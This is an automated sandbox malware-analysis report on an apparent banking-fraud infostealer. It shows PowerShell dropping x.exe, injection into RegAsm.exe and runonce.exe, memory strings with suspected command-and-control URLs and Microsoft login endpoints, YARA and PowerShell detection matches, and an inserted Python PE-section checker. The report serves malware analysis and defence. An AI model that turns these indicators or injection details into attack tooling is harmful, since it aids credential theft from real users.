ac 5f b1 60 df d1 e6 20 83 4f 77 5d 0c fb b2 a8 9a 57 64 7d ec 37 d1 93 0f bb d8 83 f7 cf 9d 0f a3 38 8f 9b 18 a4 f7 b5 07 52 f8 84 7f fc 2a aa 89 9b 14 7e a2 30 6a a4 17 cd 68 52 b4 b9 ff 88 be 0c be 10 d4 cd 29 85 a3 8b dd 3e 9b cb ab eb cf cc 97 e6 16 fe 69 f4 5f 5f bb 97 16 14 79 73 1f 80 2c 4e 4f 0f 23 a1 8a 41 fa 61 a4 c0 b4 83 4d ec 81 0f a3 1a e4 f5 7d 0d ab 38 f8 fd 3d 5b 1d 9f e1 c3 08 a7 ca e1 fb c9 34 ce e1 Data Ascii: 
f12fbZYJr~B9g]jH=$X./QU/URw?8JdfDdd,_Po2^JkGQ~{|Fc06"o`7]}Ea6=wwS"x.S73P_` Ow]Wd}78R*~0jhR)>i__ys,NO#AaM}8=[4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:37:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWBWsn0Q6zMydut34po5PrvAKK%2Bnp1znmoVmIF7IBmqwjKSnGPvr5UeqqTdf6ImbEavn8nFx28%2BSMZtee5cNrSWQeonXdDpl%2B6OqohYbaFpJJSSWEvBOENuU7xhJ6tRruFcT%2F2bc38Dni8k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc4f2dffc0f99-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=543&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 31 65 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c Data Ascii: 2a1e<!DOCTYPE 
html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <titl
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 14 Feb 2025 11:38:05 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGanyTt1TsrOogO42lKwedoGqEYu6vKmlULfrhFTZDIb%2Bv60g4F7AgGc2tl1a5kfX9TPGE%2BZagTLqPvfugC%2FlzvXvItioonZ4ThyD5wznCyIXUm7VSTIBDDXsL%2BWkH5lFW%2Fk6vAfTSg%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 911cc5172f598c0b-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 14 Feb 2025 11:38:08 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1hL%2BpES0eMF8zXgAVom81N%2FNymkDQnRBjst2HfN66xlhL%2BJA0tXd1fgDcXSPsef4n%2BzQIt%2BU%2B%2Fen%2FGZg6djpCDTxGlZCEfNquXPM8r2qzeb8DSFdnxg0S1NgVcnWOkTY0AEPi5WmIjo%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 911cc526f8a53314-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1972&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 14 Feb 2025 11:38:10 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XkWqvjwFKdNhtcBS%2FRHsXvcDR4Mpn8nDTslcF4moJhKyNTJ6U7GMlmWTw840kpGkIpk0k9Lk9MFXKHtst0Ea666riE4QIwyP5Hhse3gHGmXU%2Fi11STU0hISa2bXSt9S0ZWZXWx1EtPs%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 911cc5375a4a4316-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1582&rtt_var=791&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1843&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a | Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 14 Feb 2025 11:38:13 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hTL4T9jSjk5beu4UV49ai%2BCwdLKQlwvuoDLRTV9SEtAFEvijBy%2FK%2Fr2b%2Bkp%2F%2BhHnjlBskDonDRny7QSaBcD08KLLZ0DtUr19ZqkL0E8YKJiB%2BujgUovzUs0hOTjSu%2BfpW2muj3HHTRE%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 911cc5481c390c88-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a | Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 148 | Content-Type: text/html | Date: Fri, 14 Feb 2025 11:38:19 GMT | Etag: "6746afef-94" | Server: nginx | X-Cache: BYPASS | Connection: close | Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 148 | Content-Type: text/html | Date: Fri, 14 Feb 2025 11:38:22 GMT | Etag: "6746afef-94" | Server: nginx | X-Cache: BYPASS | Connection: close | Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 148 | Content-Type: text/html | Date: Fri, 14 Feb 2025 11:38:25 GMT | Etag: "6746afef-94" | Server: nginx | X-Cache: BYPASS | Connection: close | Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: runonce.exe, 0000000A.00000002.2615702549.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.0000000003968000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000000.00000002.1348711002.0000000005426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000000.00000002.1348711002.00000000052D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000000.00000002.1348711002.0000000005426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2612552379.0000000001415000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kjuw.party
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2612552379.0000000001415000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kjuw.party/e0jv/
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000000.00000002.1348711002.00000000052D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000000.00000002.1348711002.0000000005426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: runonce.exe, 0000000A.00000002.2608327762.000000000368C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runonce.exe, 0000000A.00000002.2608327762.000000000368C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runonce.exe, 0000000A.00000003.2018673679.00000000081F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.00000000037D6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.seasay.xyz/c9ts/?ddE=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJn
                Source: runonce.exe, 0000000A.00000002.2615702549.0000000005C64000.00000004.10000000.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2126788211.000000002B9E4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/
                Source: runonce.exe, 0000000A.00000002.2615702549.0000000005C64000.00000004.10000000.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2126788211.000000002B9E4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

                E-Banking Fraud

                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: x.exe.0.dr | Static PE information: section name: |]e@TkD
                Source: x.exe.0.dr | Static PE information: section name:
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
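The two static observations on x.exe above, a section named with special characters and a section with no name at all, are cheap to reproduce on any dropped file without a PE library. The Python below is an added example (not the report's or the sandbox's own code): it walks the PE headers with the standard library to the section table, reads the eight-byte name of each section and classifies it, accepting the COFF long-name convention (a "/" followed by a decimal string-table offset) as legitimate. build_pe and SAMPLE_PE are a constructed fixture, not the real x.exe; the name "|]e@TkD" is the printable rendering the report shows, and the character allowlist in CONVENTIONAL_CHARS is my own choice.

```python
import string
import struct

# Characters found in conventional section names (.text, .rdata, UPX0, _RDATA, .00cfg, ...).
# This allowlist is the example's own heuristic, not a rule from the report.
CONVENTIONAL_CHARS = set(string.ascii_letters + string.digits + "._$")


def build_pe(section_names):
    """Build a minimal PE32 image carrying the given section names.

    Constructed fixture for this example only: every header field the parser does not read is
    zero, so the result is not loadable. Names longer than 8 bytes are cut the way the table cuts them.
    """
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_of_optional_header = 0xE0                   # PE32 optional header
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x014C, len(section_names), 0, 0, 0,
                              size_of_optional_header, 0x0102)
    optional_header = b"\x00" * size_of_optional_header
    section_table = b"".join(
        name.encode("latin-1")[:8].ljust(8, b"\x00") + b"\x00" * 32   # IMAGE_SECTION_HEADER is 40 bytes
        for name in section_names
    )
    return dos_header + b"PE\x00\x00" + file_header + optional_header + section_table


def section_names(pe: bytes):
    """Return the raw section names from the section table, NUL padding stripped."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    file_header_off = e_lfanew + 4
    _, number_of_sections, _, _, _, size_of_optional_header, _ = struct.unpack_from(
        "<HHIIIHH", pe, file_header_off)
    table_off = file_header_off + 20 + size_of_optional_header
    names = []
    for i in range(number_of_sections):
        header = pe[table_off + 40 * i: table_off + 40 * (i + 1)]
        if len(header) < 40:
            raise ValueError("section table truncated at entry %d" % i)
        names.append(header[:8].rstrip(b"\x00"))
    return names


def classify_section_name(raw: bytes) -> str:
    """'nameless', 'special chars' or 'ok', mirroring the two static findings raised on x.exe."""
    if not raw:
        return "nameless"
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        return "special chars"                       # high bytes are never a conventional name
    if name.startswith("/") and name[1:].isdigit():  # COFF long name: offset into the string table
        return "ok"
    if all(c in CONVENTIONAL_CHARS for c in name):
        return "ok"
    return "special chars"


def suspicious_sections(pe: bytes):
    """[(index, name, verdict)] for every section the classifier does not accept."""
    findings = []
    for i, raw in enumerate(section_names(pe)):
        verdict = classify_section_name(raw)
        if verdict != "ok":
            findings.append((i, raw.decode("latin-1"), verdict))
    return findings


# Fixture: two ordinary sections, the name the report shows for x.exe, a nameless one, and .rsrc.
SAMPLE_PE = build_pe([".text", ".rdata", "|]e@TkD", "", ".rsrc"])

if __name__ == "__main__":
    for index, name, verdict in suspicious_sections(SAMPLE_PE):
        print("section %d %r: %s" % (index, name, verdict))
```

The parser deliberately reads only the fields it needs (e_lfanew, NumberOfSections, SizeOfOptionalHeader) and bounds-checks the section table, so it also works on the truncated or header-only dumps that commonly come out of a sandbox.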
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042CAA3 NtClose,5_2_0042CAA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42B60 NtClose,LdrInitializeThunk,5_2_02D42B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02D42C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02D42DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D435C0 NtCreateMutant,LdrInitializeThunk,5_2_02D435C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D44340 NtSetContextThread,5_2_02D44340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D44650 NtSuspendThread,5_2_02D44650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42AD0 NtReadFile,5_2_02D42AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42AF0 NtWriteFile,5_2_02D42AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42AB0 NtWaitForSingleObject,5_2_02D42AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42BF0 NtAllocateVirtualMemory,5_2_02D42BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42BE0 NtQueryValueKey,5_2_02D42BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42B80 NtQueryInformationFile,5_2_02D42B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42BA0 NtEnumerateValueKey,5_2_02D42BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42EE0 NtQueueApcThread,5_2_02D42EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42E80 NtReadVirtualMemory,5_2_02D42E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42EA0 NtAdjustPrivilegesToken,5_2_02D42EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42E30 NtWriteVirtualMemory,5_2_02D42E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42FE0 NtCreateFile,5_2_02D42FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42F90 NtProtectVirtualMemory,5_2_02D42F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42FB0 NtResumeThread,5_2_02D42FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42FA0 NtQuerySection,5_2_02D42FA0
